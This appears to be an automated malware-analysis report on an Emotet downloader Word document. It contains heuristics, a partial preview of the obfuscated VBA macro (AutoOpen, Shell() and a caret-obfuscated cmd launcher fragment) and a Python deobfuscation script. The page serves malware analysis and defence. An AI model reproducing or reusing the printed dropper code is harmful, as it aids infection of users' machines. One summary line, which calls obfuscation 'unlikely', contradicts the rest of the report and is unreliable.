Verdict: MALICIOUS (risk score 402)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample is a Word OLE document whose VBA project contains an AutoOpen subroutine, the entry point Emotet maldocs typically use. The macro code is heavily obfuscated: junk arrays filled by Mid/MidB/Left/Right calls over undeclared variables, character codes spread over additions such as Chr(4 + 0 + 7 + 6 + 30) (which is Chr(47), "/"), and string fragments riddled with carets. It ends in a Shell() call, which points to a download-and-execute stage. The string-building function SzVQpkmXW() in the extracted macro resolves to `d /V^:/C"^s^e^t ^\` followed by caret-separated digits; once cmd.exe consumes the carets this reads `d /V:/C"set \...`, the `cmd /V:/C"set ...` launcher pattern familiar from Emotet droppers. The ClamAV signature Doc.Downloader.Emotet-6872603-0 corroborates the downloader classification. Note that the only URL extracted from the document is an OOXML schema namespace, so the download location is not visible in the static output shown here.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6872603-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6872603-0.
- Embedded Office document has suspicious static findings [critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE]: A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- VBA macros detected [medium, OLE_VBA_MACROS; 2 related findings, the next two entries]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 448,512 bytes but its declared streams total only 200,104 bytes; 248,408 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Cross-check against the carved artifacts below: the embedded OLE body starts at offset 0x36AC2 (223,938 bytes into the file) and is 224,574 bytes long, so it runs exactly to the end of the 448,512-byte file.
- Password-protected archive handoff [high, SE_PASSWORD_ARCHIVE_LURE]: Document gives password instructions for an archive or attachment, a lure often used to keep payloads encrypted until after gateway scanning.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The "no modern VBA project was recovered" wording conflicts with the OLE_VBA_MACROS finding above, which did recover a VBA project, so treat this marker as corroborating evidence only.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI found in ordinary Office files; it is not a payload or command-and-control location.
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 231,046 bytes | 1a5cbcedd35dd54678c2a5fa30c547dadd15cf9ad47f5ed46597656f12b4f693 |
| macros_1.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 231,022 bytes | 8ee36c31aef55dd9896d94d718918cb6f54e6ca3b540a6a2732b0ad0df5033c1 |
| embedded_office_off00036ac2.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x36AC2 | 224,574 bytes | 19b9837609a7ef5548b80351507131b8289b559c10b73d4a564a50c31c39edc7 |

Detection
ClamAV: Doc.Downloader.Emotet-6872603-0
Obfuscation or payload: unlikely

Preview of macros.bas (first 1,000 lines of the extracted script). The preview the analyzer shows for macros_1.bas is identical over this portion; the two files differ by 24 bytes and have different hashes, so diff them past the preview before treating them as the same module.

```vb
Attribute VB_Name = "jtTwjtRwjhdJFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim Glifh(2)
Glifh(0) = MidB(qRzaB + FzBEhzRkCIiSpKmfXjZ + LbuZAiL, 286, 776) + MidB(JMjJU + McXChPnooWLEftGCrkq + qfdBSbdL, 608, 263)
Glifh(1) = Left(HItiu + XsdijuqqRAlWmBmiUN + fqSJN, 713) + MidB(zWwTAN + GblbtibqivrsPshzrNl + ptDPa, 360, 556)
Dim pXtck(1)
pXtck(0) = Mid(Ocpjp + hiPHTQFVwjlAbMBwmDs + cQwdl, 913, 866) + MidB(OVlKLJ + GBvvwQYCpisjbKfCTczZ + SlGaFp, 833, 264) + Left(rCIdzXaY + XkmjFjHPWIfffSbHzr + izcCBDvB, 483) + MidB(siwZVFJk + pPMdwUzRGSsjdwiD + iIwmwj, 869, 126)
Dim zaJtC(2)
zaJtC(0) = MidB(IjCId + KsOdmAwtvfwkknFVjfjW + GCHTisp, 371, 990) + MidB(TqkiFEH + GRXVciHANbWjwqaoCqd + HoiUqbb, 536, 165)
zaJtC(1) = Mid(ofmqwpi + cJXADjPTLXdhqNiQZmz + JsTEksMH, 206, 979) + Left(QdQKLzIw + GoYCsRszdwLNKtazPS + QXaRGNo, 821)
Dim LvEzwI(1)
LvEzwI(0) = Left(ElJflZ + aawHjzEwTNjNJPDQEdD + jYsifB, 718) + MidB(qbkBYv + GbivuGvVfhJHNdaKGZTU + RXhfBbHD, 259, 449) + Right(amRwJY + HLcEFzlFRnHcjNqEDZF + vNDosKQu, 967) + MidB(FudZdiWw + UUbJijSSiBRmIJsvBtI + XpkRa, 494, 59)
krErjrCJirijBJ (KeyString(jdoiQ + iqCHM + 4 + 6 + 1 + 5 + 51 + tqqrG + dzGGPqB) + sPQLM + AMZbVd + KeyString(vUmDpCO + aCjib + 4 + 7 + 1 + 6 + 59 + BuiKswP + WpihCLA) + SzVQpkmXW + wFfzfEYzzPl + jwGGsdHEf + tInFCFq + lcvEusMMIRm + CtkoPMfZML + KIfKwTc + phCLcXrwIN + pVPSR + BhRiO + cljlDjLp + OWYLcLOkhfk + GCXVzCZh + DfPsnuJRu + mCRLLwfDqBR + ALiEi + DNSLiPX + bsbiK + ZfzooHUj)
Dim ObpXSv(2)
ObpXSv(0) = Right(vOJNCQdm + SGZBfZElGiTljLTtjTr + NDisz, 738) + Left(bDicZM + wNKZRdWhWEJtbPVobChE + MrhEDG, 979)
ObpXSv(1) = MidB(iGhRmlaM + iaYDOHNYUAQIEjwSd + mDqiu, 947, 666) + MidB(qWbQv + SzpBaCpRWNiBdtjOVMfNQVUS + htIPudVo, 265, 585) + MidB(ZkXjAB + pNnGTcnkjFkfWQSGAYs + EGnupjVT, 901, 239) + Mid(FBvSql + YzjCUuiuXZwMpCsusKmpSR + CWnKnd, 357, 501)
Dim iCuqL(1)
iCuqL(0) = Right(mtwBts + TjjztiiUTcTTjkRFYED + qHsQcv, 620) + Right(uUbnhP + iqXiizDMRbnCqPQllRrH + uZOFcDCO, 553) + MidB(rhIIpE + EzVDFKWdEiqikZpGGOYYZ + ZjAdw, 240, 956) + MidB(qZVIuFi + ziiHoiAznPfjDlmXzIS + CCODj, 241, 19)
End Sub
Attribute VB_Name = "kauCoYXnIH"
Function SzVQpkmXW()
BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55))
mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " "
jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3"
JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^"
iYunfiR = "9" + "50" + "^" + " " + "^"
SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR
Dim zDShz(1)
zDShz(0) = Right(XIIVSLqm + asjPjcbqjwwJrUUXH + GSTHPJ, 392) + Left(ZHHpDw + CpGIXzcLMaqWOOmOvbl + UOZVY, 144) + MidB(LDURnEiS + EwufwKscRjNoRVwaYEDG + StzUHDv, 414, 947) + Left(NoSPca + JwPDvpQZBaAqNAdQUOorrkz + rKvdZ, 356)
Dim YTcjW(2)
YTcjW(0) = MidB(JTRqriz + WVlEIQuLTsiKdXZziKzkb + uLWIirzR, 475, 884) + Left(fpnOE + wwqtuMFLnYkJkRVJoAhtEdc + KvwtizVs, 85) + MidB(wZtlizJ + NTEZuRRFmQSpLrfGLPY + NNPHvO, 88, 394) + Mid(jqrWwNUD + AIGNGVTCwIoCmLVWqhv + fwZUhsrL, 722, 978)
YTcjW(1) = Mid(HBAab + UrroEKLwhwkEiKvSmK + DDVGZAVv, 287, 942) + Mid(wnIVJQh + oOLwqTqIwHNuokrLdlh + cRuBaIW, 552, 278) + Left(pKJjji + wXSEzmFYWPslTZZoEz + wcZvYuI, 592) + Right(boDKNv + DzGzZHOYKHqMGWsTbNKQrQ + mhJLdKP, 932)
Dim DqBfrd(2)
DqBfrd(0) = MidB(Xjjzno + wJZVGYTDPihGwbXZatzdl + UDSmMC, 234, 274) + MidB(tBafWE + uVNaFIJOYnzjoDPdRDjV + MiotuD, 784, 403) + Right(PKtwKcsn + hiERrbHLYOAVLtaUVwif + YKQToK, 869) + Mid(hdaWBT + JccPohjHSSSDGwTQ + XOUSE, 572, 296)
DqBfrd(1) = MidB(ZBZkVCWF + LmjraPpaTahCEGHwkEqd + RtriAkqk, 777, 610) + Right(WuDPzojY + UijnOJzYJXwIVwjjzNZl + MsVEBtlC, 355)
End Function
Function wFfzfEYzzPl()
DiaZCswVSSJ = "1" + "0" + "^" + "3" + "^ "
```

... (truncated)
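The Chr()-arithmetic and caret string assembly in SzVQpkmXW() above can be resolved mechanically rather than by hand. The Python below is an added example written for this page, not part of the analyzer's output or of the sample: it takes the six assignment lines of SzVQpkmXW() transcribed from the preview as constructed input, sums the integer terms of each Chr() call instead of calling eval(), treats the undeclared junk identifiers as VBA Empty (which concatenates as an empty string), and finally deletes the carets the way cmd.exe consumes them. The function and regex names are mine; the idiom it parses is exactly the one the macro uses.

```python
import re

# Constructed sample: the string-building lines transcribed from the page's own
# SzVQpkmXW() preview (the surrounding junk Dim/array lines are omitted).
SAMPLE_VBA = r'''
BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55))
mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " "
jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3"
JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^"
iYunfiR = "9" + "50" + "^" + " " + "^"
SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR
'''

# One operand of the idiom: a string literal, CStr(Chr(<int additions>)),
# a bare Chr(<int additions>), or an identifier. The "+" separators between
# operands match no alternative and are skipped by finditer().
TOKEN = re.compile(r'''
      "(?P<lit>[^"]*)"
    | CStr\(Chr\((?P<chr1>[\d\s+]+)\)\)
    | Chr\((?P<chr2>[\d\s+]+)\)
    | (?P<ident>[A-Za-z_]\w*)
''', re.VERBOSE)

# "name = <expression>"; the first "=" on the line is the assignment.
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')


def eval_chr(expr: str) -> str:
    """Chr(4 + 0 + 7 + 6 + 30) -> '/'. The only arithmetic the macro uses is
    addition of integer literals, so summing the terms replaces any eval()."""
    return chr(sum(int(term) for term in expr.split('+')))


def eval_expr(rhs: str, env: dict) -> str:
    """Concatenate the operands of one right-hand side, left to right."""
    parts = []
    for m in TOKEN.finditer(rhs):
        if m.group('lit') is not None:
            parts.append(m.group('lit'))
        elif m.group('chr1') is not None:
            parts.append(eval_chr(m.group('chr1')))
        elif m.group('chr2') is not None:
            parts.append(eval_chr(m.group('chr2')))
        else:
            # Undeclared junk names are Empty in VBA, and "x" + Empty is "x".
            parts.append(env.get(m.group('ident'), ''))
    return ''.join(parts)


def evaluate(vba: str) -> dict:
    """Walk the assignment lines in order; return the resolved variable table."""
    env = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = eval_expr(m.group(2), env)
    return env


def strip_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape that yields the following character, and
    the macro uses carets only in that role, so deleting them exposes the
    command. This is a readability heuristic, not cmd's full parser (inside a
    quoted region a caret is literal), so confirm against the final Shell()
    argument rather than trusting it blindly."""
    return cmdline.replace('^', '')


if __name__ == '__main__':
    table = evaluate(SAMPLE_VBA)
    print(repr(table['SzVQpkmXW']))
    print(repr(strip_carets(table['SzVQpkmXW'])))
```

Run as a script it prints the raw fragment `d /V^:/C"^s^e^t ^\^.],=^51^3 9^50 51^9 ^9^13^ 590^ 093 ^950^ ^` and its caret-stripped form `d /V:/C"set \.],=513 950 519 913 590 093 950 `. To rebuild the whole command line, feed the remaining string-building functions named in the krErjrCJirijBJ argument (wFfzfEYzzPl, jwGGsdHEf, and so on) through the same evaluator and concatenate their results in the order they appear in that call.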